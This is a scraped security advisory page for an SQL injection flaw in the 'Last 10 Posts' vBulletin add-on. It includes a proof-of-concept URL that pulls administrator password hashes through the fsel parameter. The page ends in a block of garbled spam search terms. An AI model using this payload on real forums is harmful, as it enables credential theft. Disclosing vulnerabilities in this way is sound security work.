about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Last 10 Posts Add-On Script For VBulletin SQL Injection Vulnerability


Title Last 10 Posts Add-On Script For VBulletin SQL Injection Vulnerability
Published 2004-12-06-12:00AM
Updated 2004-12-06-05:33PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovery of this vulnerability is credited to "DokFLeed" <dokfleed@dokfleed.net>.
Vulnerable  Last 10 Posts Last 10 Posts 2.0.1
Not Vulnerable  
Code   The following proof of concept is available:

#/last.php?fsel=,user.password%20as%20title,user.%20%20username%20as%20lastposter%20FROM%20user,thread%20%20%20WHERE%20usergroupid=1%20LIMIT%201/*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 00:31:20 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Smart Movi Amir.Khan 200 /compo www.tjpeix www.tjpeix Www.petard WWW.XXL.FR news for C www.taojok 0551dy.com all ...om_ mysmartbb Sendmail 8 www.80845. zero-lengt www.sdjhti indai sex Sexcy ram Maduredece asinimages 200 /compo freeanimal www.lalats addguest.h PHP Advanc PHP Advanc Powered b Www.inders WWW SEX.18 Sexcy ram wap.phon Xxxindan eklogin MicrosoRe sexymovie eklogin wap.phon sexymovie AFGHANSEXT nmap joomla 1.8 Sex boys i sex tv1 ch Knowledge /search/ex www.jnding www.jnding CMS is Fre t963t gunpheng@l